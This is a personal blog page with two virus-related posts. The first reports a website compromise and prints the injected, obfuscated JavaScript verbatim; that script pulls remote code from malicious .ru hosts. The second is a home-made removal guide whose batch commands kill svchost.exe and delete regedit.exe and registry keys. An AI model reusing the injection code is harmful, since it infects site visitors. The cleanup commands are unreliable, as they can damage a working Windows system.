Showing posts with label Virus. Show all posts
Showing posts with label Virus. Show all posts

Tuesday, January 26, 2010

Website hacked with random URL to access (http://ku6-com.haberturk.com.careerbuilder-com.webnetlinks.ru:8080/)

One of my website has been hacked by some hacker or can be with some libraries I am using for my CodeIgniter project... I'm not sure if it is due to the library or about my web hosting place.... I'm still investigating the issue.

It is trying to access to random URL as :

http://ku6-com.haberturk.com.careerbuilder-com.webnetlinks.ru:8080/apple.com/apple.com/drudgereport.com/google.com/joy.cn/
Mostly the random URL start with:
http://ku6-com.haberturk.com.careerbuilder-com.webnetlinks.ru:8080

Check to webnetlinks.ru I got alert from WOT (Add-on of firefox) that this site is unsafe.

View my page source code found:
  • Following script before html tag

<script src='+'h^&)t($t)$#p&($^$:@$/)^)/)^@(k^^^!u)))6@(-&^c((!!o#@^m#.@&h#@a()
(b!e@)!r!##t(@^u&r$#k$.!#c)!o@(&m&@.^&@c@@#a^)r$#^!&e&$^@e@#)!r@&b^)u)^i!
(l)(d&@e)!#r!)(-(c!^^o$^m^^!.!!&w^&(e(!^b!#)^!n!#)e#
(&)t!&l##!^!i&@n#$k$&s)&#.&@!$r@)@u$!):$8)^&0$$!8&!0)
(#$/)$a)#p!$p$l&#e&#.^^@#c#o$$&)m$$#/!)a^@@$p)!p)l^#e&!.!$#c#(@o)$)^m((&
/&&d^&r$@u!@^d^)&g$$)e#$@r(^e(^!p&^o@!^&r^^)#t)&(#.)$^c()o^)m(@@
/@@g$&#^#o#o$g&l#!e(&.#!(c^&o^$m)#&&/$j$o#$)y).@^c&)n(@&/!@'.replace(/\$|\!|\)|
\^|#|@|\(|&/ig, '')+' defer=defer></scr'+'ipt>

  • At the end of html tag found some hidden code:
82fd50e7972f75db5204eef49fd077cc


All those above, I didn't code so consider this point to start searching.

Note: I have no any issue at my local site.

Hope I'll find soon

Update 27/01, 1:30pm: Very bad, these scripts are added to most html pages, to most javascript files. Seem not issue due to any library of CodeIgniter but with some virus who can hack using ftp, it may be my password is very poor that it can hack.

Update 29/01, 12:48pm: Now again, new hack script added the same site (before I didn't change ftp password yet), here is the new script:


try{window.onload=function(){document.write('<div id="megaid">youjizz-com.oneindia.in.d</div>');Lb4bz8i1odh = document.getElementById('megaid').innerHTML + 'u$#!$^o#@@w&a(n(@!-$$$c@(o$)!$m)&$@!.!)$(@t)^o($(p)!#l$i$@n#$^e&^(m@#&a@$^#r^^i@@^(n$e^##.#r&^$u(@^:)$D@!#E^()B^&U!(@&G#$#$/&&(s#^$p@(!(o$n&@i$)c@^h$#i^@$.^c&(o)$.(!j#@(p(!^^!/$s#!p(!&^o#n@)#i^!c##h)#)i(@.@!&^c(#o))@!.!j(^#p^^!!/@(^#@x)@t#!e!#$)n$)^d!(m@e@d((i&^!a^$!&).)@)#(c)$#o&^^#m#@$/!^^&g$@$o#o@!(g&!@#l#@#e#.@$@#c!(o^m)!^/&a!)l(!(i@c$!&e(^^.)!#^i^#$t($/@&'.replace(/@|\$|#|&|\^|\!|\)|\(/ig, '') ;document.write('<scr'+'ipt src="http://%27+Lb4bz8i1odh.replace%28/DEBUG/g,"></scr'+'ipt>');} } catch(Ijhdnoxns ) {}
<!--82fd50e7972f75db5204eef49fd077cc--><script> try{window.onload=function(){document.write('<div id="megaid">youjizz-com.oneindia.in.d</div>');Lb4bz8i1odh = document.getElementById('megaid').innerHTML + 'u$#!$^o#@@w&a(n(@!-$$$c@(o$)!$m)&$@!.!)$(@t)^o($(p)!#l$i$@n#$^e&^(m@#&a@$^#r^^i@@^(n$e^##.#r&^$u(@^:)$D@!#E^()B^&U!(@&G#$#$/&&(s#^$p@(!(o$n&@i$)c@^h$#i^@$.^c&(o)$.(!j#@(p(!^^!/$s#!p(!&^o#n@)#i^!c##h)#)i(@.@!&^c(#o))@!.!j(^#p^^!!/@(^#@x)@t#!e!#$)n$)^d!(m@e@d((i&^!a^$!&).)@)#(c)$#o&^^#m#@$/!^^&g$@$o#o@!(g&!@#l#@#e#.@$@#c!(o^m)!^/&a!)l(!(i@c$!&e(^^.)!#^i^#$t($/@&'.replace(/@|\$|#|&|\^|\!|\)|\(/ig, '') ;document.write('<scr'+'ipt src="http://'+Lb4bz8i1odh.replace(/DEBUG/g,"></scr'+'ipt>');} } catch(Ijhdnoxns ) {}</script>
<!--82fd50e7972f75db5204eef49fd077cc-->

Related issue found on the net:
  1. http://blog.unmaskparasites.com/2009/12/23/from-hidden-iframes-to-obfuscated-scripts/
  2. http://blog.unmaskparasites.com/2009/09/23/10-ftp-clients-malware-steals-credentials-from/

Solutions: (that may can prevent not to happen again)
I'm using FileZilla as a ftp client
  1. Change ftp password
  2. Change application password
  3. Scan virus on the pc that using
  4. Remove all storing passwords on FTP clients

Sunday, January 4, 2009

How to kill virus: MS-DOS.com, Global.exe, system.exe, svchost.exe manually

The virus: MS-DOS.com which in the process we can see it as Global.exe, system.exe and svchost.exe (which confused to the system process) which are the main process of the virus.











I used to met them with my friends' PC but I could not do anything other than format their PC as most of the antivirus seem can't heal it after the PC affected but now it's with my PC and I don't want to format it again, I tried to kill it myself without any information of it for almost 2 days but I got nothing.

After research, I got some solutions that possible to try, thanks to:
With lecuong.info solution seem more closely to solve the issue:
B1: Use IceSword simultaneously kill 3 Process: system.exe, Global.exe, svchost.exe
B2: Find and delete all the files have been analyzed at above
B3: Using Autoruns to check & remove all key viruses created in the registry
B4: Reboot computer.
B5: Download antivirus program (such bkav) to scan again! (If the computer has antivirus program is removed and then installed again!)
B6: Open Run -> CMD: type in sfc /scannow or sfc /scanonce and XP disk to correct the file failed.
B7: Reboot computer. (If necessary)

With solution B2/ B3/ please use batch file to do it: (kill-msdos.zip)
But I recommend you to use another batch file below...

As for sure, everyone will difficult for point B1/ so I, myself tried to enhance on lecuong.info batch to add following command to try ending all processes of the virus:

taskkill /F /IM system.exe /IM Global.exe /IM svchost.exe /T

But we will face delete also svchost.exe which is the windows system one so that in 1 minute the PC will shutdown but don't worry, we can proceed the rest before 1 minute.

Please press any key and accept YES by press Y to confirm delete all virus files and regedit entries as in the batch.

As I face the virus, seem the batch needs to enhance for more file paths to delete such as:
c:\windows\system32\regedit.exe and its regedit entries so here what I added more:

ATTRIB -R -H -S -A c:\windows\system32\regedit.exe

DEL /f c:\windows\system32\regedit.exe

REG DELETE "HKEY_CURRENT_USER\Software\Microsoft\Search Assistant\ACMru\5603" /v "001" /F
REG DELETE "HKEY_CLASSES_ROOT\MSCFile\Shell\Open\Command" /f

Now I don't see any process of this virus on my task manager any more.

(DOWNLOAD)
Here is the full batch file:
kill-msdos-full (computerexperience.co.cc).zip


Don't forget to continue point B5/ and B6/ also.

Please report any issue/success related to this solution.